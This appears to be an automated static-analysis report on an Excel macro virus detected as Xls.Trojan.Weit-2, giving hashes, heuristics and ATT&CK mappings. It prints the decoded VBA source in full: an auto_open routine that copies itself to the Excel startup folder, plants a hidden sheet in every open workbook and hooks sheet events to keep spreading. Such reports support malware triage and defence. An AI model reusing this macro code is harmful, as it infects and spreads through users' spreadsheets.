Xls.Trojan.Weit-2 — Office (OLE) malware analysis

Static analysis result for SHA-256 6d99d5ca20e252a6…

MALICIOUS

Office (OLE)

50.0 KB Created: 1999-02-08 09:24:15 Authoring application: Microsoft Excel First seen: 2015-09-19
MD5: 2d1701024cd47b3abaeff9a1a2a1aa70 SHA-1: 1c92dd11d28064c96d001d72c5009643f082ea73 SHA-256: 6d99d5ca20e252a62cd8ec35b2fc761e5a87a052bc0fc406dc8c82268fe32aa7
268 Risk Score

Malware Insights

Xls.Trojan.Weit-2 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document with a high-confidence detection of VBA macros, specifically an Auto_Open macro, indicating it is designed to execute malicious code upon opening. ClamAV signatures identify it as 'Xls.Trojan.Weit-2'. The presence of VBA macros strongly suggests an initial access vector via spearphishing attachment.

Heuristics 6

  • ClamAV: Xls.Trojan.Weit-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Weit-2
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 23,516 bytes but its declared streams total only 0 bytes — 23,516 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4034 bytes
SHA-256: 0a38183ea088ae0db0b5d11dcf9b98c0d2b53b9d733b7e319777032ec3ec00a7
Detection
ClamAV: Xls.Trojan.Weit-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EXCELLS"







Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
Dim startpfad As String

    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    startpfad = Application.StartupPath
    If Right$(startpfad, 1) = "\" Then
        startpfad = startpfad + "_X_X_X_X.XLS"
    Else
        startpfad = startpfad + "\_X_X_X_X.XLS"
    End If
    If chk_first_time(startpfad) Then
        ActiveWorkbook.SaveCopyAs (startpfad)
    Else
        Close #1
    End If
    If Workbooks.Count <= 1 Then
        Workbooks.Add
    End If
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ActiveWorkbook.Name & "!EXCELLS.weitergehts"
            End If
        End If
    Next w
    Application.ScreenUpdating = True
    If ThisWorkbook.Name = "_X_X_X_X.XLS" Then
        ThisWorkbook.Close
    Else
        ThisWorkbook.Activate
    End If
End Sub

Function chk_first_time(datei As String) As Integer
Attribute chk_first_time.VB_ProcData.VB_Invoke_Func = " \n14"
    chk_first_time = False
    On Error GoTo fehler
    Open (datei) For Input As 1
    On Error Resume Next
    Exit Function
fehler:
    chk_first_time = True
    Resume Next
End Function

Sub weitergehts()
Attribute weitergehts.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    On Error Resume Next
    For Each w In Workbooks
        If w.Name <> ThisWorkbook.Name Then
            If Workbooks(w.Name).Sheets(1).Name <> "EXCELLS" Then
                ThisWorkbook.Sheets("EXCELLS").Copy before:=Workbooks(w.Name).Sheets(1)
                Workbooks(w.Name).Sheets("EXCELLS").Visible = False
                Application.OnSheetDeactivate = ""
            End If
        End If
    Next w
    Application.ScreenUpdating = True
End Sub
embedded_office_off00006c25.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x6C25 23516 bytes
SHA-256: d98109068c3b2c485131b3cceb194389cbe9c6b7232eadaef67fabebd43201a0

Open this report in the interactive analyzer, or submit your own file for analysis.